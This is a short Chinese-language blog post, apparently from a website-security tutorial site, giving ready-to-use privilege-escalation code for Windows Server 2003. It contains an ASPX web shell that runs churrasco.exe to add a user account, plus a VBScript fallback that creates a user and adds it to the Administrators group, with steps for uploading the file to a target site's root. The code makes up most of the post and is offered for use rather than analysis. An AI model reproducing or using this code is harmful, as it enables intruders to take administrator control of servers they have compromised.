使用 Aspx下03系统0day的提权方法的提权成功率非常高.可是需要满足一下条件
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false"%> <%@ import Namespace="System.IO" %> <%@ import Namespace="System.Diagnostics" %> <%@ import Namespace="System.Data" %> <%@ import Namespace="System.Data.OleDb" %> <%@ import Namespace="Microsoft.Win32" %> <%@ import Namespace="System.Net.Sockets" %> <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %> <%@ import Namespace="System.DirectoryServices" %> <% System.Diagnostics.Process myP = new System.Diagnostics.Process(); myP.StartInfo. RedirectStandardOutput = true; myP.StartInfo.FileName=Server.MapPath("churrasco.exe"); myP.StartInfo.UseShellExecute = false; myP.StartInfo.Arguments= " \"net user 用户 密码 /add\" "; myP.Start(); string output = myP.StandardOutput.ReadToEnd(); Response.Write(output); %>
使用方法: 1.修改0day.aspx脚本中需要添加的帐号和密码 比如 目标沾站点是 www.exehack.net 0day.aspx上传到了网站根目录
如果前面的方法提权不成功,那么有可能是管理员将net net1删除或者没有权限 那么即可用到以下方法:
set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") Set od=ob.Create("user","用户名") od.SetPassword "密码" od.SetInfo Set of=GetObject(os&"/用户",user) oe.add os&"/用户"
这里还是需要修改一些自己设置的用户名和密码。 然后还需要将来下ASPX oday代码里面的 myP.StartInfo.Arguments= ” \”net user 用户 密码 /add\” “;
|
-
上一篇: webshell写入启动项目提权 – 网站安全 – 自学php
下一篇: php is_numberic函数安全吗 – 网站安全 – 自学php
评论前必须登录!
立即登录